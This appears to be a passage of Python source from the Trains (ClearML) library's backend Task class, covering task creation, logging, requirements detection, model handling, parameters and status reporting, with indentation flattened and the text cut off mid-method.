""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
_force_requirements = {}
_store_diff = config.get('development.store_uncommitted_code_diff', False)
_offline_filename = 'task.json'
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
training = 'training'
testing = 'testing'
inference = "inference"
data_processing = "data_processing"
application = "application"
monitor = "monitor"
controller = "controller"
optimizer = "optimizer"
service = "service"
qc = "qc"
custom = "custom"
class TaskStatusEnum(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
created = "created"
queued = "queued"
in_progress = "in_progress"
stopped = "stopped"
published = "published"
publishing = "publishing"
closed = "closed"
failed = "failed"
completed = "completed"
unknown = "unknown"
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
:param log: Optional log to be used. If not provided, and internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, used only if a new task is created. The new task will be associated
with a project by this name. If no such project exists, a new project will be created using the API.
:type project_name: str
:param task_name: Optional task name, used only if a new task is created.
:type project_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self.__edit_lock = None
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._input_model = None
self._output_model = None
self._metrics_manager = None
self._reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = (
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
)
self._app_server = None
self._files_server = None
self._initial_iteration_offset = 0
self._reload_skip_flag = False
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
if self._offline_mode:
self.data.id = self.id
self.name = task_name
else:
# this is an existing task, let's try to verify stuff
self._validate()
if self.data is None:
raise ValueError("Task ID \"{}\" could not be found".format(self.id))
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = log_to_backend
self._setup_log(default_log_to_backend=log_to_backend)
self._artifacts_manager = Artifacts(self)
def _setup_log(self, default_log_to_backend=None, replace_existing=False):
"""
Setup logging facilities for this task.
:param default_log_to_backend: Should this task log to the backend. If not specified, value for this option
will be obtained from the environment, with this value acting as a default in case configuration for this is
missing.
If the value for this option is false, we won't touch the current logger configuration regarding TaskHandler(s)
:param replace_existing: If True and another task is already logging to the backend, replace the handler with
a handler for this task.
"""
# Make sure urllib is never in debug/info,
disable_urllib3_info = config.get('log.disable_urllib3_info', True)
if disable_urllib3_info and logging.getLogger('urllib3').isEnabledFor(logging.INFO):
logging.getLogger('urllib3').setLevel(logging.WARNING)
log_to_backend = get_log_to_backend(default=default_log_to_backend) or self._log_to_backend
if not log_to_backend:
return
# Handle the root logger and our own logger. We use set() to make sure we create no duplicates
# in case these are the same logger...
loggers = {logging.getLogger(), LoggerRoot.get_base_logger()}
# Find all TaskHandler handlers for these loggers
handlers = {logger: h for logger in loggers for h in logger.handlers if isinstance(h, TaskHandler)}
if handlers and not replace_existing:
# Handlers exist and we shouldn't replace them
return
# Remove all handlers, we'll add new ones
for logger, handler in handlers.items():
logger.removeHandler(handler)
# Create a handler that will be used in all loggers. Since our handler is a buffering handler, using more
# than one instance to report to the same task will result in out-of-order log reports (grouped by whichever
# handler instance handled them)
backend_handler = TaskHandler(task=self)
# Add backend handler to both loggers:
# 1. to root logger root logger
# 2. to our own logger as well, since our logger is not propagated to the root logger
# (if we propagate our logger will be caught be the root handlers as well, and
# we do not want that)
for logger in loggers:
logger.addHandler(backend_handler)
def _validate(self, check_output_dest_credentials=True):
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
# noinspection PyBroadException
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version and not SUPPRESS_UPDATE_MESSAGE_ENV_VAR.get(
default=config.get('development.suppress_update_message', False)):
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'{} new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
Session.get_clients()[0][0].upper(), latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'TRAINS new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(
filepaths=[self._calling_filename, sys.argv[0], ]
if ScriptInfo.is_running_from_module() else [sys.argv[0], self._calling_filename, ],
log=self.log, create_requirements=False, check_uncommitted=self._store_diff
)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
# if the git is too large to store on the task, we must store it as artifact:
if result.auxiliary_git_diff:
diff_preview = "# git diff too large to handle, storing as artifact. git diff summary:\n"
diff_preview += '\n'.join(
line for line in result.auxiliary_git_diff.split('\n') if line.startswith('diff --git '))
self._artifacts_manager.upload_artifact(
name='auxiliary_git_diff', artifact_object=result.auxiliary_git_diff,
preview=diff_preview,
)
# store original entry point
entry_point = result.script.get('entry_point') if result.script else None
# check if we are running inside a module, then we should set our entry point
# to the module call including all argv's
result.script = ScriptInfo.detect_running_module(result.script)
# Since we might run asynchronously, don't use self.data (let someone else
# overwrite it before we have a chance to call edit)
with self._edit_lock:
self.reload()
self.data.script = result.script
self._edit(script=result.script)
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
entry_point_filename = None if config.get('development.force_analyze_entire_repo', False) else \
os.path.join(result.script['working_dir'], entry_point)
if config.get('development.detect_with_pip_freeze', False):
conda_requirements = ""
requirements = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n\n'\
+ get_command_output([sys.executable, "-m", "pip", "freeze"])
else:
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=entry_point_filename)
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except SystemExit:
pass
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s UTC by %(user)s@%(host)s')
if task_type.value not in (self.TaskTypes.training, self.TaskTypes.testing) and \
not Session.check_min_api_version('2.8'):
print('WARNING: Changing task type to "{}" : '
'trains-server does not support task type "{}", '
'please upgrade trains-server.'.format(self.TaskTypes.training, task_type.value))
task_type = self.TaskTypes.training
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name, created_msg)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type.value),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id if res else 'offline-{}'.format(str(uuid4()).replace("-", ""))
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
if self._storage_uri or self._output_model:
self.output_model.upload_storage_uri = self._storage_uri
@property
def storage_uri(self):
# type: () -> Optional[str]
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
# type: (str) -> ()
self._set_storage_uri(value)
@property
def task_id(self):
# type: () -> str
return self.id
@property
def name(self):
# type: () -> str
return self.data.name or ''
@name.setter
def name(self, value):
# type: (str) -> ()
self.set_name(value)
@property
def task_type(self):
# type: () -> str
return self.data.type
@property
def project(self):
# type: () -> str
return self.data.project
@property
def parent(self):
# type: () -> str
return self.data.parent
@property
def input_model_id(self):
# type: () -> str
return self.data.execution.model
@property
def output_model_id(self):
# type: () -> str
return self.data.output.model
@property
def comment(self):
# type: () -> str
return self.data.comment or ''
@comment.setter
def comment(self, value):
# type: (str) -> ()
self.set_comment(value)
@property
def cache_dir(self):
# type: () -> Path
""" The cache directory which is used to store the Task related files. """
return Path(get_cache_dir()) / self.id
@property
def status(self):
# type: () -> str
"""
The Task's status. To keep the Task updated.
Trains reloads the Task status information only, when this value is accessed.
return str: TaskStatusEnum status
"""
return self.get_status()
@property
def _status(self):
# type: () -> str
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
@property
def input_model(self):
# type: () -> Optional[Model]
""" A model manager used to handle the input model object """
model_id = self._get_task_property('execution.model', raise_on_error=False)
if not model_id:
return None
if self._input_model is None:
self._input_model = Model(
session=self.session,
model_id=model_id,
cache_dir=self.cache_dir,
log=self.log,
upload_storage_uri=None)
return self._input_model
@property
def output_model(self):
# type: () -> Optional[Model]
""" A model manager used to manage the output model object """
if self._output_model is None:
self._output_model = self._get_output_model(upload_required=True)
return self._output_model
def create_output_model(self):
# type: () -> Model
return self._get_output_model(upload_required=False, force=True)
def _get_output_model(self, upload_required=True, force=False, model_id=None):
# type: (bool, bool, Optional[str]) -> Model
return Model(
session=self.session,
model_id=model_id or (None if force else self._get_task_property(
'output.model', raise_on_error=False, log_on_error=False)),
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
# type: () -> Metrics
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def reporter(self):
# type: () -> Reporter
"""
Returns a simple metrics reporter instance.
"""
if self._reporter is None:
self._setup_reporter()
return self._reporter
def _get_metrics_manager(self, storage_uri):
# type: (str) -> Metrics
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task=self,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics'),
iteration_offset=self.get_initial_iteration()
)
return self._metrics_manager
def _setup_reporter(self):
# type: () -> Reporter
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self._reporter = Reporter(self._get_metrics_manager(storage_uri=storage_uri))
return self._reporter
def _get_output_destination_suffix(self, extra_path=None):
# type: (Optional[str]) -> str
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x)
def _reload(self):
# type: () -> Any
""" Reload the task object from the backend """
with self._edit_lock:
if self._offline_mode:
# noinspection PyBroadException
try:
with open(self.get_offline_mode_folder() / self._offline_filename, 'rt') as f:
stored_dict = json.load(f)
stored_data = tasks.Task(**stored_dict)
# add missing entries
for k, v in stored_dict.items():
if not hasattr(stored_data, k):
setattr(stored_data, k, v)
if stored_dict.get('project_name'):
self._project_name = (None, stored_dict.get('project_name'))
except Exception:
stored_data = self._data
return stored_data or tasks.Task(
execution=tasks.Execution(
parameters={}, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd=''),
output=tasks.Output())
if self._reload_skip_flag and self._data:
return self._data
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True):
# type: (bool) -> ()
""" Reset the task. Task will be reloaded following a successful reset. """
self.send(tasks.ResetRequest(task=self.id))
if set_started_on_success:
self.started()
elif self._data:
# if not started, make sure the current cached state is synced
self._data.status = self.TaskStatusEnum.created
self.reload()
def started(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task started. """
return self.send(tasks.StartedRequest(self.id, force=force), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task stopped. """
return self.send(tasks.StoppedRequest(self.id, force=force), ignore_errors=ignore_errors)
def completed(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal indicating that this Task completed. """
if hasattr(tasks, 'CompletedRequest') and callable(tasks.CompletedRequest):
return self.send(tasks.CompletedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
return self.send(tasks.StoppedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None):
# type: (bool, Optional[str], Optional[str]) -> ()
""" The signal that this Task stopped. """
return self.send(tasks.FailedRequest(self.id, status_reason=status_reason, status_message=status_message),
ignore_errors=ignore_errors)
def publish(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task will be published """
if str(self.status) != str(tasks.TaskStatusEnum.stopped):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def update_model_desc(self, new_model_desc_file=None):
# type: (Optional[str]) -> ()
""" Change the Task's model description. """
with self._edit_lock:
self.reload()
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('mode_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(self, model_uri, name=None, comment=None, tags=None):
# type: (str, Optional[str], Optional[str], Optional[Sequence[str]]) -> ()
"""
Update the Task's output model. Use this method to update the output model when you have a local model URI,
for example, storing the weights file locally, and specifying a ``file://path/to/file`` URI)
.. important::
This method only updates the model's metadata using the API. It does not upload any data.
:param model_uri: The URI of the updated model weights file.
:type model_uri: str
:param name: The updated model name. (Optional)
:type name: str
:param comment: The updated model description. (Optional)
:type comment: str
:param tags: The updated model tags. (Optional)
:type tags: [str]
"""
self._conditionally_start_task()
self._get_output_model(upload_required=False).update_for_task(model_uri, self.id, name, comment, tags)
def update_output_model_and_upload(
self,
model_file, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
async_enable=False, # type: bool
cb=None, # type: Optional[Callable[[Optional[bool]], bool]]
iteration=None, # type: Optional[int]
):
# type: (...) -> str
"""
Update the Task's output model weights file. First, Trains uploads the file to the preconfigured output
destination (see the Task's ``output.destination`` property or call the ``setup_upload`` method),
then Trains updates the model object associated with the Task an API call. The API call uses with the URI
of the uploaded file, and other values provided by additional arguments.
:param str model_file: The path to the updated model weights file.
:param str name: The updated model name. (Optional)
:param str comment: The updated model description. (Optional)
:param list tags: The updated model tags. (Optional)
:param bool async_enable: Request asynchronous upload?
- ``True`` - The API call returns immediately, while the upload and update are scheduled in another thread.
- ``False`` - The API call blocks until the upload completes, and the API call updating the model returns.
(default)
:param callable cb: Asynchronous callback. A callback. If ``async_enable`` is set to ``True``,
this is a callback that is invoked once the asynchronous upload and update complete.
:param int iteration: iteration number for the current stored model (Optional)
:return: The URI of the uploaded weights file. If ``async_enable`` is set to ``True``,
this is the expected URI, as the upload is probably still in progress.
"""
self._conditionally_start_task()
uri = self.output_model.update_for_task_and_upload(
model_file, self.id, name=name, comment=comment, tags=tags, async_enable=async_enable, cb=cb,
iteration=iteration
)
return uri
def _conditionally_start_task(self):
# type: () -> ()
if str(self.status) == str(tasks.TaskStatusEnum.created):
self.started()
@property
def labels_stats(self):
# type: () -> dict
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
# type: (dict, bool) -> ()
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(self, model_id=None, model_name=None, update_task_design=True, update_task_labels=True):
# type: (str, Optional[str], bool, bool) -> ()
"""
Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the
Task's input model.
:param model_id: The Id of the model on the **Trains Server** (backend). If ``model_name`` is not specified,
then ``model_id`` must be specified.
:param model_name: The model name. The name is used to locate an existing model in the **Trains Server**
(backend). If ``model_id`` is not specified, then ``model_name`` must be specified.
:param update_task_design: Update the Task's design?
- ``True`` - Trains copies the Task's model design from the input model.
- ``False`` - Trains does not copy the Task's model design from the input model.
:param update_task_labels: Update the Task's label enumeration?
- ``True`` - Trains copies the Task's label enumeration from the input model.
- ``False`` - Trains does not copy the Task's label enumeration from the input model.
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by=['-created'],
only_fields=['id', 'created']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
else:
# clear the input model
model = None
model_id = ''
with self._edit_lock:
self.reload()
# store model id
self.data.execution.model = model_id
# Auto populate input field from model, if they are empty
if update_task_design and not self.data.execution.model_desc:
self.data.execution.model_desc = model.design if model else ''
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
def set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
if not all(isinstance(x, (dict, Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
update = kwargs.pop('__update', False)
with self._edit_lock:
self.reload()
if update:
parameters = self.get_parameters()
else:
parameters = dict()
parameters.update(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
parameters.update(kwargs)
not_allowed = {
k: type(v).__name__
for k, v in parameters.items()
if not isinstance(v, self._parameters_allowed_types)
}
if not_allowed:
raise ValueError(
"Only builtin types ({}) are allowed for values (got {})".format(
', '.join(t.__name__ for t in self._parameters_allowed_types),
', '.join('%s=>%s' % p for p in not_allowed.items())),
)
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: str(v) if v is not None else "" for k, v in parameters.items()}
execution = self.data.execution
if execution is None:
execution = tasks.Execution(
parameters=parameters, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd='')
else:
execution.parameters = parameters
self._edit(execution=execution)
def set_parameter(self, name, value, description=None):
# type: (str, str, Optional[str]) -> ()
"""
Set a single Task parameter. This overrides any previous value for this parameter.
:param name: The parameter name.
:param value: The parameter value.
:param description: The parameter description.
.. note::
The ``description`` is not yet in use.
"""
# not supported yet
if description:
# noinspection PyUnusedLocal
description = None
self.set_parameters({name: value}, __update=True)
def get_parameter(self, name, default=None):
# type: (str, Any) -> Any
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: The Parameter value (or default value if parameter is not defined).
"""
params = self.get_parameters()
return params.get(name, default)
def update_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does
not support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
self.set_parameters(__update=True, *args, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
# type: (Mapping[str, int]) -> ()
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
enumeration = enumeration or {}
with self._edit_lock:
self.reload()
execution = self.data.execution
if enumeration is None:
return
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
def _set_default_docker_image(self):
# type: () -> ()
if not DOCKER_IMAGE_ENV_VAR.exists():
return
self.set_base_docker(DOCKER_IMAGE_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd):
# type: (str) -> ()
"""
Set the base docker image for this experiment
If provided, this value will be used by trains-agent to execute this experiment
inside the provided docker image.
"""
with self._edit_lock:
self.reload()
execution = self.data.execution
execution.docker_cmd = docker_cmd
self._edit(execution=execution)
def get_base_docker(self):
# type: () -> str
"""Get the base Docker command (image) that is set for this experiment."""
return self._get_task_property('execution.docker_cmd', raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
# type: (Sequence[tasks.Artifact]) -> ()
"""
List of artifacts (tasks.Artifact) to update the task
:param list artifacts_list: list of artifacts (type tasks.Artifact)
"""
if not Session.check_min_api_version('2.3'):
return False
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts to [tasks.Artifacts]')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
def _set_model_design(self, design=None):
# type: (str) -> ()
with self._edit_lock:
self.reload()
execution = self.data.execution
if design is not None:
# noinspection PyProtectedMember
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
# type: () -> Mapping[str, int]
"""
Get the label enumeration dictionary label enumeration dictionary of string (label) to integer (value) pairs.
:return: A dictionary containing the label enumeration.
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
# type: () -> str
"""
Get the model configuration as blob of text.
:return: The model configuration as blob of text.
"""
design = self._get_task_property("execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
# noinspection PyProtectedMember
return Model._unwrap_design(design)
def set_output_model_id(self, model_id):
# type: (str) -> ()
self.data.output.model = str(model_id)
self._edit(output=self.data.output)
def get_random_seed(self):
# type: () -> int
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# type: (int) -> ()
# fixed seed for the time being
pass
def set_project(self, project_id):
# type: (str) -> ()
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
# type: () -> Optional[str]
if self.project is None:
return self._project_name[1] if self._project_name and len(self._project_name) > 1 else None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("tags")
def set_system_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def get_system_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("system_tags" if Session.check_min_api_version('2.3') else "tags")
def set_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
# type: (str) -> ()
"""
Set the Task name.
:param name: The name of the Task.
:type name: str
"""
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_parent(self, parent):
# type: (Optional[Union[str, Task]]) -> ()
"""
Set the parent task for the Task.
:param parent: The parent task id (or parent Task object) for the Task. Set None for no parent.
:type parent: str or Task
"""
if parent:
assert isinstance(parent, (str, Task))
if isinstance(parent, Task):
parent = parent.parent
assert parent != self.id
self._set_task_property("parent", str(parent) if parent else None)
self._edit(parent=self.data.parent)
def set_comment(self, comment):
# type: (str) -> ()
"""
Set a comment / description for the Task.
:param comment: The comment / description for the Task.
:type comment: str
"""
self._set_task_property("comment", str(comment))
self._edit(comment=comment)
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
For example, to start on iteration 100000, including scalars and plots:
..code-block:: py
task.set_initial_iteration(100000)
Task.set_initial_iteration(100000)
:param int offset: Initial iteration (at starting point)
:return: A newly set initial offset.
"""
if not isinstance(offset, int):
raise ValueError("Initial iteration offset must be an integer")
self._initial_iteration_offset = offset
if self._metrics_manager:
self._metrics_manager.set_iteration_offset(self._initial_iteration_offset)
return self._initial_iteration_offset
def get_initial_iteration(self):
# type: () -> int
"""
Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
:return: The initial iteration offset.
"""
return self._initial_iteration_offset
def get_status(self):
# type: () -> str
"""
Return The task status without refreshing the entire Task object object (only the status property)
TaskStatusEnum: ["created", "in_progress", "stopped", "closed", "failed", "completed",
"queued", "published", "publishing", "unknown"]
:return: str: Task status as string (TaskStatusEnum)
"""
status = self._get_status()[0]
if self._data:
self._data.status = status
return str(status)
def get_output_log_web_page(self):
# type: () -> str
"""
Return the Task results & outputs web page address.
For example: https://demoapp.trains.allegro.ai/projects/216431/experiments/60763e04/output/log
:return: http/s URL link.
"""
return '{}/projects/{}/experiments/{}/output/log'.format(
self._get_app_server(),
self.project if self.project is not None else '*',
self.id,
)
def get_reported_scalars(
self,
max_samples=0, # type: int
x_axis='iter' # type: str
):
# type: (...) -> Mapping[str, Mapping[str, Mapping[str, Sequence[float]]]]
"""
Return a nested dictionary for the scalar graphs,
where the first key is the graph title and the second is the series name.
Value is a dict with 'x': values and 'y': values
.. note::
This call is not cached, any call will retrieve all the scalar reports from the back-end.
If the Task has many scalars reported, it might take long for the call to return.
Example:
.. code-block:: py
{'title': {'series': {
'x': [0, 1 ,2],
'y': [10, 11 ,12],
}}}
:param int max_samples: Maximum samples per series to return. Default is 0 returning all scalars.
With sample limit, average scalar values inside sampling window.
:param str x_axis: scalar x_axis, possible values:
'iter': iteration (default), 'timestamp': seconds from start, 'iso_time': absolute time
:return: dict: Nested scalar graphs: dict[title(str), dict[series(str), dict[axis(str), list(float)]]]
"""
if x_axis not in ('iter', 'timestamp', 'iso_time'):
raise ValueError("Scalar x-axis supported values are: 'iter', 'timestamp', 'iso_time'")
# send request
res = self.send(
events.ScalarMetricsIterHistogramRequest(
task=self.id, key=x_axis, samples=max(1, max_samples) if max_samples else None),
raise_on_errors=False,
ignore_errors=True,
)
if not res:
return {}
response = res.wait()
if not response.ok() or not response.response_data:
return {}
return response.response_data
def get_reported_console_output(self, number_of_reports=1):
# type: (int) -> Sequence[str]
"""
Return a list of console outputs reported by the Task. Retrieved outputs are the most updated console outputs.
:param int number_of_reports: The number of reports to return. The default value is ``1``, indicating the
last (most updated) console output
:return: A list of strings, each entry corresponds to one report.
"""
res = self.send(
events.GetTaskLogRequest(
task=self.id,
order='asc',
from_='tail',
batch_size=number_of_reports,)
)
response = res.wait()
if not response.ok() or not response.response_data.get('events'):
return []
lines = [r.get('msg', '') for r in response.response_data['events']]
return lines
@classmethod
def get_projects(cls):
# type: () -> (List['projects.Project'])
"""
Return a list of projects in the system, sorted by last updated time
:return: A list of all the projects in the system. Each entry is a `services.projects.Project` object.
"""
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update']), raise_on_errors=True)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()) for p in res.response.projects]
return []
@staticmethod
def running_locally():
# type: () -> bool
"""
Is the task running locally (i.e., ``trains-agent`` is not executing it)?
:return: True, if the task is running locally. False, if the task is not running locally.
"""
return not running_remotely()
@classmethod
def add_requirements(cls, package_name, package_version=None):
# type: (str, Optional[str]) -> ()
"""
Force the adding of a package to the requirements list. If ``package_version`` is not specified, use the
installed package version, if found.
:param str package_name: The package name to add to the "Installed Packages" section of the task.
:param package_version: The package version requirements. If ``None``, then use the installed version.
"""
cls._force_requirements[package_name] = package_version
def _get_models(self, model_type='output'):
# type: (str) -> Sequence[Model]
# model_type is either 'output' or 'input'
model_type = model_type.lower().strip()
assert model_type == 'output' or model_type == 'input'
